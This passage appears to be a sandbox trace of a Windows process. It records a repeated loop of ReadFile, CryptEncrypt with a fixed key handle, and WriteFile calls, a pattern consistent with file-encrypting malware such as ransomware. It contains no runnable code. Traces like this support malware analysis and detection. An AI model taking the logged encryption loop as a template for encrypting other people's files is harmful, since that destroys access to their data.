nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.387] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.387] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.387] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.387] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.387] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.387] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.388] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.388] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.389] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.389] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.390] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.390] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.391] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.391] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.392] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.392] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.392] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.392] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.392] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.392] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.393] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.393] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.393] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.393] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.393] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.393] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.393] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.393] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.393] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 